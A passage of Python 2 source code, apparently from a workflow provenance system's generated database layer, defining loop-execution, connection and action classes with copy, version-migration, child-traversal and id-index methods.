elif hasattr(old_obj, 'db_items') and old_obj.db_items is not None:
for obj in old_obj.db_items:
if obj.vtType == 'module_exec':
new_obj.db_add_item(DBModuleExec.update_version(obj, trans_dict))
elif obj.vtType == 'group_exec':
new_obj.db_add_item(DBGroupExec.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_items') and hasattr(new_obj, 'db_deleted_items'):
for obj in old_obj.db_deleted_items:
if obj.vtType == 'module_exec':
n_obj = DBModuleExec.update_version(obj, trans_dict)
new_obj.db_deleted_items.append(n_obj)
elif obj.vtType == 'group_exec':
n_obj = DBGroupExec.update_version(obj, trans_dict)
new_obj.db_deleted_items.append(n_obj)
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'user' in class_dict:
res = class_dict['user'](old_obj, trans_dict)
new_obj.db_user = res
elif hasattr(old_obj, 'db_user') and old_obj.db_user is not None:
new_obj.db_user = old_obj.db_user
if 'ip' in class_dict:
res = class_dict['ip'](old_obj, trans_dict)
new_obj.db_ip = res
elif hasattr(old_obj, 'db_ip') and old_obj.db_ip is not None:
new_obj.db_ip = old_obj.db_ip
if 'session' in class_dict:
res = class_dict['session'](old_obj, trans_dict)
new_obj.db_session = res
elif hasattr(old_obj, 'db_session') and old_obj.db_session is not None:
new_obj.db_session = old_obj.db_session
if 'vt_version' in class_dict:
res = class_dict['vt_version'](old_obj, trans_dict)
new_obj.db_vt_version = res
elif hasattr(old_obj, 'db_vt_version') and old_obj.db_vt_version is not None:
new_obj.db_vt_version = old_obj.db_vt_version
if 'ts_start' in class_dict:
res = class_dict['ts_start'](old_obj, trans_dict)
new_obj.db_ts_start = res
elif hasattr(old_obj, 'db_ts_start') and old_obj.db_ts_start is not None:
new_obj.db_ts_start = old_obj.db_ts_start
if 'ts_end' in class_dict:
res = class_dict['ts_end'](old_obj, trans_dict)
new_obj.db_ts_end = res
elif hasattr(old_obj, 'db_ts_end') and old_obj.db_ts_end is not None:
new_obj.db_ts_end = old_obj.db_ts_end
if 'parent_id' in class_dict:
res = class_dict['parent_id'](old_obj, trans_dict)
new_obj.db_parent_id = res
elif hasattr(old_obj, 'db_parent_id') and old_obj.db_parent_id is not None:
new_obj.db_parent_id = old_obj.db_parent_id
if 'parent_type' in class_dict:
res = class_dict['parent_type'](old_obj, trans_dict)
new_obj.db_parent_type = res
elif hasattr(old_obj, 'db_parent_type') and old_obj.db_parent_type is not None:
new_obj.db_parent_type = old_obj.db_parent_type
if 'parent_version' in class_dict:
res = class_dict['parent_version'](old_obj, trans_dict)
new_obj.db_parent_version = res
elif hasattr(old_obj, 'db_parent_version') and old_obj.db_parent_version is not None:
new_obj.db_parent_version = old_obj.db_parent_version
if 'completed' in class_dict:
res = class_dict['completed'](old_obj, trans_dict)
new_obj.db_completed = res
elif hasattr(old_obj, 'db_completed') and old_obj.db_completed is not None:
new_obj.db_completed = old_obj.db_completed
if 'name' in class_dict:
res = class_dict['name'](old_obj, trans_dict)
new_obj.db_name = res
elif hasattr(old_obj, 'db_name') and old_obj.db_name is not None:
new_obj.db_name = old_obj.db_name
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
to_del = []
for child in self.db_items:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_item(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_items)
if remove:
self.db_deleted_items = []
return children
def has_changes(self):
if self.is_dirty:
return True
for child in self._db_items:
if child.has_changes():
return True
return False
def __get_db_items(self):
return self._db_items
def __set_db_items(self, items):
self._db_items = items
self.is_dirty = True
db_items = property(__get_db_items, __set_db_items)
def db_get_items(self):
return self._db_items
def db_add_item(self, item):
self.is_dirty = True
self._db_items.append(item)
self.db_items_id_index[item.db_id] = item
def db_change_item(self, item):
self.is_dirty = True
found = False
for i in xrange(len(self._db_items)):
if self._db_items[i].db_id == item.db_id:
self._db_items[i] = item
found = True
break
if not found:
self._db_items.append(item)
self.db_items_id_index[item.db_id] = item
def db_delete_item(self, item):
self.is_dirty = True
for i in xrange(len(self._db_items)):
if self._db_items[i].db_id == item.db_id:
if not self._db_items[i].is_new:
self.db_deleted_items.append(self._db_items[i])
del self._db_items[i]
break
del self.db_items_id_index[item.db_id]
def db_get_item(self, key):
for i in xrange(len(self._db_items)):
if self._db_items[i].db_id == key:
return self._db_items[i]
return None
def db_get_item_by_id(self, key):
return self.db_items_id_index[key]
def db_has_item_with_id(self, key):
return key in self.db_items_id_index
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_user(self):
return self._db_user
def __set_db_user(self, user):
self._db_user = user
self.is_dirty = True
db_user = property(__get_db_user, __set_db_user)
def db_add_user(self, user):
self._db_user = user
def db_change_user(self, user):
self._db_user = user
def db_delete_user(self, user):
self._db_user = None
def __get_db_ip(self):
return self._db_ip
def __set_db_ip(self, ip):
self._db_ip = ip
self.is_dirty = True
db_ip = property(__get_db_ip, __set_db_ip)
def db_add_ip(self, ip):
self._db_ip = ip
def db_change_ip(self, ip):
self._db_ip = ip
def db_delete_ip(self, ip):
self._db_ip = None
def __get_db_session(self):
return self._db_session
def __set_db_session(self, session):
self._db_session = session
self.is_dirty = True
db_session = property(__get_db_session, __set_db_session)
def db_add_session(self, session):
self._db_session = session
def db_change_session(self, session):
self._db_session = session
def db_delete_session(self, session):
self._db_session = None
def __get_db_vt_version(self):
return self._db_vt_version
def __set_db_vt_version(self, vt_version):
self._db_vt_version = vt_version
self.is_dirty = True
db_vt_version = property(__get_db_vt_version, __set_db_vt_version)
def db_add_vt_version(self, vt_version):
self._db_vt_version = vt_version
def db_change_vt_version(self, vt_version):
self._db_vt_version = vt_version
def db_delete_vt_version(self, vt_version):
self._db_vt_version = None
def __get_db_ts_start(self):
return self._db_ts_start
def __set_db_ts_start(self, ts_start):
self._db_ts_start = ts_start
self.is_dirty = True
db_ts_start = property(__get_db_ts_start, __set_db_ts_start)
def db_add_ts_start(self, ts_start):
self._db_ts_start = ts_start
def db_change_ts_start(self, ts_start):
self._db_ts_start = ts_start
def db_delete_ts_start(self, ts_start):
self._db_ts_start = None
def __get_db_ts_end(self):
return self._db_ts_end
def __set_db_ts_end(self, ts_end):
self._db_ts_end = ts_end
self.is_dirty = True
db_ts_end = property(__get_db_ts_end, __set_db_ts_end)
def db_add_ts_end(self, ts_end):
self._db_ts_end = ts_end
def db_change_ts_end(self, ts_end):
self._db_ts_end = ts_end
def db_delete_ts_end(self, ts_end):
self._db_ts_end = None
def __get_db_parent_id(self):
return self._db_parent_id
def __set_db_parent_id(self, parent_id):
self._db_parent_id = parent_id
self.is_dirty = True
db_parent_id = property(__get_db_parent_id, __set_db_parent_id)
def db_add_parent_id(self, parent_id):
self._db_parent_id = parent_id
def db_change_parent_id(self, parent_id):
self._db_parent_id = parent_id
def db_delete_parent_id(self, parent_id):
self._db_parent_id = None
def __get_db_parent_type(self):
return self._db_parent_type
def __set_db_parent_type(self, parent_type):
self._db_parent_type = parent_type
self.is_dirty = True
db_parent_type = property(__get_db_parent_type, __set_db_parent_type)
def db_add_parent_type(self, parent_type):
self._db_parent_type = parent_type
def db_change_parent_type(self, parent_type):
self._db_parent_type = parent_type
def db_delete_parent_type(self, parent_type):
self._db_parent_type = None
def __get_db_parent_version(self):
return self._db_parent_version
def __set_db_parent_version(self, parent_version):
self._db_parent_version = parent_version
self.is_dirty = True
db_parent_version = property(__get_db_parent_version, __set_db_parent_version)
def db_add_parent_version(self, parent_version):
self._db_parent_version = parent_version
def db_change_parent_version(self, parent_version):
self._db_parent_version = parent_version
def db_delete_parent_version(self, parent_version):
self._db_parent_version = None
def __get_db_completed(self):
return self._db_completed
def __set_db_completed(self, completed):
self._db_completed = completed
self.is_dirty = True
db_completed = property(__get_db_completed, __set_db_completed)
def db_add_completed(self, completed):
self._db_completed = completed
def db_change_completed(self, completed):
self._db_completed = completed
def db_delete_completed(self, completed):
self._db_completed = None
def __get_db_name(self):
return self._db_name
def __set_db_name(self, name):
self._db_name = name
self.is_dirty = True
db_name = property(__get_db_name, __set_db_name)
def db_add_name(self, name):
self._db_name = name
def db_change_name(self, name):
self._db_name = name
def db_delete_name(self, name):
self._db_name = None
def getPrimaryKey(self):
return self._db_id
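# DBWorkflowExec stores its items as a single heterogeneous list: as the
# vtType dispatch in update_version above shows, an item may be either a
# DBModuleExec or a DBGroupExec. db_items_id_index is one dict keyed by
# db_id, so item ids are expected to be unique across both kinds; adding
# two items with the same db_id silently overwrites the index entry.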
class DBLoopExec(object):
vtType = 'loop_exec'
def __init__(self, id=None, ts_start=None, ts_end=None, completed=None, error=None, module_execs=None, group_execs=None):
self._db_id = id
self._db_ts_start = ts_start
self._db_ts_end = ts_end
self._db_completed = completed
self._db_error = error
self.db_deleted_module_execs = []
self.db_module_execs_id_index = {}
if module_execs is None:
self._db_module_execs = []
else:
self._db_module_execs = module_execs
for v in self._db_module_execs:
self.db_module_execs_id_index[v.db_id] = v
self.db_deleted_group_execs = []
self.db_group_execs_id_index = {}
if group_execs is None:
self._db_group_execs = []
else:
self._db_group_execs = group_execs
for v in self._db_group_execs:
self.db_group_execs_id_index[v.db_id] = v
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBLoopExec.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBLoopExec(id=self._db_id,
ts_start=self._db_ts_start,
ts_end=self._db_ts_end,
completed=self._db_completed,
error=self._db_error)
if self._db_module_execs is None:
cp._db_module_execs = []
else:
cp._db_module_execs = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_module_execs]
if self._db_group_execs is None:
cp._db_group_execs = []
else:
cp._db_group_execs = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_group_execs]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# recreate indices and set flags
cp.db_module_execs_id_index = dict((v.db_id, v) for v in cp._db_module_execs)
cp.db_group_execs_id_index = dict((v.db_id, v) for v in cp._db_group_execs)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBLoopExec()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'ts_start' in class_dict:
res = class_dict['ts_start'](old_obj, trans_dict)
new_obj.db_ts_start = res
elif hasattr(old_obj, 'db_ts_start') and old_obj.db_ts_start is not None:
new_obj.db_ts_start = old_obj.db_ts_start
if 'ts_end' in class_dict:
res = class_dict['ts_end'](old_obj, trans_dict)
new_obj.db_ts_end = res
elif hasattr(old_obj, 'db_ts_end') and old_obj.db_ts_end is not None:
new_obj.db_ts_end = old_obj.db_ts_end
if 'completed' in class_dict:
res = class_dict['completed'](old_obj, trans_dict)
new_obj.db_completed = res
elif hasattr(old_obj, 'db_completed') and old_obj.db_completed is not None:
new_obj.db_completed = old_obj.db_completed
if 'error' in class_dict:
res = class_dict['error'](old_obj, trans_dict)
new_obj.db_error = res
elif hasattr(old_obj, 'db_error') and old_obj.db_error is not None:
new_obj.db_error = old_obj.db_error
if 'module_execs' in class_dict:
res = class_dict['module_execs'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_module_exec(obj)
elif hasattr(old_obj, 'db_module_execs') and old_obj.db_module_execs is not None:
for obj in old_obj.db_module_execs:
new_obj.db_add_module_exec(DBModuleExec.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_module_execs') and hasattr(new_obj, 'db_deleted_module_execs'):
for obj in old_obj.db_deleted_module_execs:
n_obj = DBModuleExec.update_version(obj, trans_dict)
new_obj.db_deleted_module_execs.append(n_obj)
if 'group_execs' in class_dict:
res = class_dict['group_execs'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_group_exec(obj)
elif hasattr(old_obj, 'db_group_execs') and old_obj.db_group_execs is not None:
for obj in old_obj.db_group_execs:
new_obj.db_add_group_exec(DBGroupExec.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_group_execs') and hasattr(new_obj, 'db_deleted_group_execs'):
for obj in old_obj.db_deleted_group_execs:
n_obj = DBGroupExec.update_version(obj, trans_dict)
new_obj.db_deleted_group_execs.append(n_obj)
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
to_del = []
for child in self.db_module_execs:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_module_exec(child)
to_del = []
for child in self.db_group_execs:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_group_exec(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_module_execs)
children.extend(self.db_deleted_group_execs)
if remove:
self.db_deleted_module_execs = []
self.db_deleted_group_execs = []
return children
def has_changes(self):
if self.is_dirty:
return True
for child in self._db_module_execs:
if child.has_changes():
return True
for child in self._db_group_execs:
if child.has_changes():
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_ts_start(self):
return self._db_ts_start
def __set_db_ts_start(self, ts_start):
self._db_ts_start = ts_start
self.is_dirty = True
db_ts_start = property(__get_db_ts_start, __set_db_ts_start)
def db_add_ts_start(self, ts_start):
self._db_ts_start = ts_start
def db_change_ts_start(self, ts_start):
self._db_ts_start = ts_start
def db_delete_ts_start(self, ts_start):
self._db_ts_start = None
def __get_db_ts_end(self):
return self._db_ts_end
def __set_db_ts_end(self, ts_end):
self._db_ts_end = ts_end
self.is_dirty = True
db_ts_end = property(__get_db_ts_end, __set_db_ts_end)
def db_add_ts_end(self, ts_end):
self._db_ts_end = ts_end
def db_change_ts_end(self, ts_end):
self._db_ts_end = ts_end
def db_delete_ts_end(self, ts_end):
self._db_ts_end = None
def __get_db_completed(self):
return self._db_completed
def __set_db_completed(self, completed):
self._db_completed = completed
self.is_dirty = True
db_completed = property(__get_db_completed, __set_db_completed)
def db_add_completed(self, completed):
self._db_completed = completed
def db_change_completed(self, completed):
self._db_completed = completed
def db_delete_completed(self, completed):
self._db_completed = None
def __get_db_error(self):
return self._db_error
def __set_db_error(self, error):
self._db_error = error
self.is_dirty = True
db_error = property(__get_db_error, __set_db_error)
def db_add_error(self, error):
self._db_error = error
def db_change_error(self, error):
self._db_error = error
def db_delete_error(self, error):
self._db_error = None
def __get_db_module_execs(self):
return self._db_module_execs
def __set_db_module_execs(self, module_execs):
self._db_module_execs = module_execs
self.is_dirty = True
db_module_execs = property(__get_db_module_execs, __set_db_module_execs)
def db_get_module_execs(self):
return self._db_module_execs
def db_add_module_exec(self, module_exec):
self.is_dirty = True
self._db_module_execs.append(module_exec)
self.db_module_execs_id_index[module_exec.db_id] = module_exec
def db_change_module_exec(self, module_exec):
self.is_dirty = True
found = False
for i in xrange(len(self._db_module_execs)):
if self._db_module_execs[i].db_id == module_exec.db_id:
self._db_module_execs[i] = module_exec
found = True
break
if not found:
self._db_module_execs.append(module_exec)
self.db_module_execs_id_index[module_exec.db_id] = module_exec
def db_delete_module_exec(self, module_exec):
self.is_dirty = True
for i in xrange(len(self._db_module_execs)):
if self._db_module_execs[i].db_id == module_exec.db_id:
if not self._db_module_execs[i].is_new:
self.db_deleted_module_execs.append(self._db_module_execs[i])
del self._db_module_execs[i]
break
del self.db_module_execs_id_index[module_exec.db_id]
def db_get_module_exec(self, key):
for i in xrange(len(self._db_module_execs)):
if self._db_module_execs[i].db_id == key:
return self._db_module_execs[i]
return None
def db_get_module_exec_by_id(self, key):
return self.db_module_execs_id_index[key]
def db_has_module_exec_with_id(self, key):
return key in self.db_module_execs_id_index
def __get_db_group_execs(self):
return self._db_group_execs
def __set_db_group_execs(self, group_execs):
self._db_group_execs = group_execs
self.is_dirty = True
db_group_execs = property(__get_db_group_execs, __set_db_group_execs)
def db_get_group_execs(self):
return self._db_group_execs
def db_add_group_exec(self, group_exec):
self.is_dirty = True
self._db_group_execs.append(group_exec)
self.db_group_execs_id_index[group_exec.db_id] = group_exec
def db_change_group_exec(self, group_exec):
self.is_dirty = True
found = False
for i in xrange(len(self._db_group_execs)):
if self._db_group_execs[i].db_id == group_exec.db_id:
self._db_group_execs[i] = group_exec
found = True
break
if not found:
self._db_group_execs.append(group_exec)
self.db_group_execs_id_index[group_exec.db_id] = group_exec
def db_delete_group_exec(self, group_exec):
self.is_dirty = True
for i in xrange(len(self._db_group_execs)):
if self._db_group_execs[i].db_id == group_exec.db_id:
if not self._db_group_execs[i].is_new:
self.db_deleted_group_execs.append(self._db_group_execs[i])
del self._db_group_execs[i]
break
del self.db_group_execs_id_index[group_exec.db_id]
def db_get_group_exec(self, key):
for i in xrange(len(self._db_group_execs)):
if self._db_group_execs[i].db_id == key:
return self._db_group_execs[i]
return None
def db_get_group_exec_by_id(self, key):
return self.db_group_execs_id_index[key]
def db_has_group_exec_with_id(self, key):
return key in self.db_group_execs_id_index
def getPrimaryKey(self):
return self._db_id
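# A loop_exec nests module_execs and group_execs, which may in turn nest
# further execs, forming the execution tree. db_children flattens that
# tree depth-first into (object, parent_type, parent_id) tuples, with the
# node itself appended last; when orphan=True each visited child is also
# detached from this node via the matching db_delete_* helper, which moves
# already-persisted children into the db_deleted_* lists.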
class DBConnection(object):
vtType = 'connection'
def __init__(self, id=None, ports=None):
self._db_id = id
self.db_deleted_ports = []
self.db_ports_id_index = {}
self.db_ports_type_index = {}
if ports is None:
self._db_ports = []
else:
self._db_ports = ports
for v in self._db_ports:
self.db_ports_id_index[v.db_id] = v
self.db_ports_type_index[v.db_type] = v
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBConnection.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBConnection(id=self._db_id)
if self._db_ports is None:
cp._db_ports = []
else:
cp._db_ports = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_ports]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# recreate indices and set flags
cp.db_ports_id_index = dict((v.db_id, v) for v in cp._db_ports)
cp.db_ports_type_index = dict((v.db_type, v) for v in cp._db_ports)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBConnection()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'ports' in class_dict:
res = class_dict['ports'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_port(obj)
elif hasattr(old_obj, 'db_ports') and old_obj.db_ports is not None:
for obj in old_obj.db_ports:
new_obj.db_add_port(DBPort.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_ports') and hasattr(new_obj, 'db_deleted_ports'):
for obj in old_obj.db_deleted_ports:
n_obj = DBPort.update_version(obj, trans_dict)
new_obj.db_deleted_ports.append(n_obj)
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
to_del = []
for child in self.db_ports:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_port(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_ports)
if remove:
self.db_deleted_ports = []
return children
def has_changes(self):
if self.is_dirty:
return True
for child in self._db_ports:
if child.has_changes():
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_ports(self):
return self._db_ports
def __set_db_ports(self, ports):
self._db_ports = ports
self.is_dirty = True
db_ports = property(__get_db_ports, __set_db_ports)
def db_get_ports(self):
return self._db_ports
def db_add_port(self, port):
self.is_dirty = True
self._db_ports.append(port)
self.db_ports_id_index[port.db_id] = port
self.db_ports_type_index[port.db_type] = port
def db_change_port(self, port):
self.is_dirty = True
found = False
for i in xrange(len(self._db_ports)):
if self._db_ports[i].db_id == port.db_id:
self._db_ports[i] = port
found = True
break
if not found:
self._db_ports.append(port)
self.db_ports_id_index[port.db_id] = port
self.db_ports_type_index[port.db_type] = port
def db_delete_port(self, port):
self.is_dirty = True
for i in xrange(len(self._db_ports)):
if self._db_ports[i].db_id == port.db_id:
if not self._db_ports[i].is_new:
self.db_deleted_ports.append(self._db_ports[i])
del self._db_ports[i]
break
del self.db_ports_id_index[port.db_id]
del self.db_ports_type_index[port.db_type]
def db_get_port(self, key):
for i in xrange(len(self._db_ports)):
if self._db_ports[i].db_id == key:
return self._db_ports[i]
return None
def db_get_port_by_id(self, key):
return self.db_ports_id_index[key]
def db_has_port_with_id(self, key):
return key in self.db_ports_id_index
def db_get_port_by_type(self, key):
return self.db_ports_type_index[key]
def db_has_port_with_type(self, key):
return key in self.db_ports_type_index
def getPrimaryKey(self):
return self._db_id
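# Sketch of the port-type index on DBConnection (illustrative; it assumes
# DBPort, defined elsewhere in this module, carries db_id and db_type, and
# that a connection uses one 'source' and one 'destination' port as in the
# rest of this package):
#
#     conn = DBConnection(id=5, ports=[src_port, dst_port])
#     conn.db_get_port_by_type('source')
#
# db_ports_type_index maps db_type -> port, so a connection keeps at most
# one port per type; adding a second port of the same type replaces the
# index entry even though both ports remain in db_ports.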
class DBAction(object):
vtType = 'action'
def __init__(self, operations=None, id=None, prevId=None, date=None, session=None, user=None, prune=None, annotations=None):
self.db_deleted_operations = []
self.db_operations_id_index = {}
if operations is None:
self._db_operations = []
else:
self._db_operations = operations
for v in self._db_operations:
self.db_operations_id_index[v.db_id] = v
self._db_id = id
self._db_prevId = prevId
self._db_date = date
self._db_session = session
self._db_user = user
self._db_prune = prune
self.db_deleted_annotations = []
self.db_annotations_id_index = {}
self.db_annotations_key_index = {}
if annotations is None:
self._db_annotations = []
else:
self._db_annotations = annotations
for v in self._db_annotations:
self.db_annotations_id_index[v.db_id] = v
self.db_annotations_key_index[v.db_key] = v
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBAction.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBAction(id=self._db_id,
prevId=self._db_prevId,
date=self._db_date,
session=self._db_session,
user=self._db_user,
prune=self._db_prune)
if self._db_operations is None:
cp._db_operations = []
else:
cp._db_operations = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_operations]
if self._db_annotations is None:
cp._db_annotations = []
else:
cp._db_annotations = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_annotations]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# remap the previous action's id so copied action chains stay linked
if hasattr(self, 'db_prevId') and ('action', self._db_prevId) in id_remap:
cp._db_prevId = id_remap[('action', self._db_prevId)]
# recreate indices and set flags
cp.db_operations_id_index = dict((v.db_id, v) for v in cp._db_operations)
cp.db_annotations_id_index = dict((v.db_id, v) for v in cp._db_annotations)
cp.db_annotations_key_index = dict((v.db_key, v) for v in cp._db_annotations)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBAction()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'operations' in class_dict:
res = class_dict['operations'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_operation(obj)
elif hasattr(old_obj, 'db_operations') and old_obj.db_operations is not None:
for obj in old_obj.db_operations:
if obj.vtType == 'add':
new_obj.db_add_operation(DBAdd.update_version(obj, trans_dict))
elif obj.vtType == 'delete':
new_obj.db_add_operation(DBDelete.update_version(obj, trans_dict))
elif obj.vtType == 'change':
new_obj.db_add_operation(DBChange.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_operations') and hasattr(new_obj, 'db_deleted_operations'):
for obj in old_obj.db_deleted_operations:
if obj.vtType == 'add':
n_obj = DBAdd.update_version(obj, trans_dict)
new_obj.db_deleted_operations.append(n_obj)
elif obj.vtType == 'delete':
n_obj = DBDelete.update_version(obj, trans_dict)
new_obj.db_deleted_operations.append(n_obj)
elif obj.vtType == 'change':
n_obj = DBChange.update_version(obj, trans_dict)
new_obj.db_deleted_operations.append(n_obj)
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'prevId' in class_dict:
res = class_dict['prevId'](old_obj, trans_dict)
new_obj.db_prevId = res
elif hasattr(old_obj, 'db_prevId') and old_obj.db_prevId is not None:
new_obj.db_prevId = old_obj.db_prevId
if 'date' in class_dict:
res = class_dict['date'](old_obj, trans_dict)
new_obj.db_date = res
elif hasattr(old_obj, 'db_date') and old_obj.db_date is not None:
new_obj.db_date = old_obj.db_date
if 'session' in class_dict:
res = class_dict['session'](old_obj, trans_dict)
new_obj.db_session = res
elif hasattr(old_obj, 'db_session') and old_obj.db_session is not None:
new_obj.db_session = old_obj.db_session
if 'user' in class_dict:
res = class_dict['user'](old_obj, trans_dict)
new_obj.db_user = res
elif hasattr(old_obj, 'db_user') and old_obj.db_user is not None:
new_obj.db_user = old_obj.db_user
if 'prune' in class_dict:
res = class_dict['prune'](old_obj, trans_dict)
new_obj.db_prune = res
elif hasattr(old_obj, 'db_prune') and old_obj.db_prune is not None:
new_obj.db_prune = old_obj.db_prune
if 'annotations' in class_dict:
res = class_dict['annotations'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_annotation(obj)
elif hasattr(old_obj, 'db_annotations') and old_obj.db_annotations is not None:
for obj in old_obj.db_annotations:
new_obj.db_add_annotation(DBAnnotation.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_annotations') and hasattr(new_obj, 'db_deleted_annotations'):
for obj in old_obj.db_deleted_annotations:
n_obj = DBAnnotation.update_version(obj, trans_dict)
new_obj.db_deleted_annotations.append(n_obj)
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
to_del = []
for child in self.db_annotations:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_annotation(child)
to_del = []
for child in self.db_operations:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_operation(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_annotations)
children.extend(self.db_deleted_operations)
if remove:
self.db_deleted_annotations = []
self.db_deleted_operations = []
return children
def has_changes(self):
if self.is_dirty:
return True
for child in self._db_annotations:
if child.has_changes():
return True
for child in self._db_operations:
if child.has_changes():
return True
return False
def __get_db_operations(self):
return self._db_operations
def __set_db_operations(self, operations):
self._db_operations = operations
self.is_dirty = True
db_operations = property(__get_db_operations, __set_db_operations)
def db_get_operations(self):
return self._db_operations
def db_add_operation(self, operation):
self.is_dirty = True
self._db_operations.append(operation)
self.db_operations_id_index[operation.db_id] = operation
def db_change_operation(self, operation):
self.is_dirty = True
found = False
for i in xrange(len(self._db_operations)):
if self._db_operations[i].db_id == operation.db_id:
self._db_operations[i] = operation
found = True
break
if not found:
self._db_operations.append(operation)
self.db_operations_id_index[operation.db_id] = operation
def db_delete_operation(self, operation):
self.is_dirty = True
for i in xrange(len(self._db_operations)):
if self._db_operations[i].db_id == operation.db_id:
if not self._db_operations[i].is_new:
self.db_deleted_operations.append(self._db_operations[i])
del self._db_operations[i]
break
del self.db_operations_id_index[operation.db_id]
def db_get_operation(self, key):
for i in xrange(len(self._db_operations)):
if self._db_operations[i].db_id == key:
return self._db_operations[i]
return None
def db_get_operation_by_id(self, key):
return self.db_operations_id_index[key]
def db_has_operation_with_id(self, key):
return key in self.db_operations_id_index
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
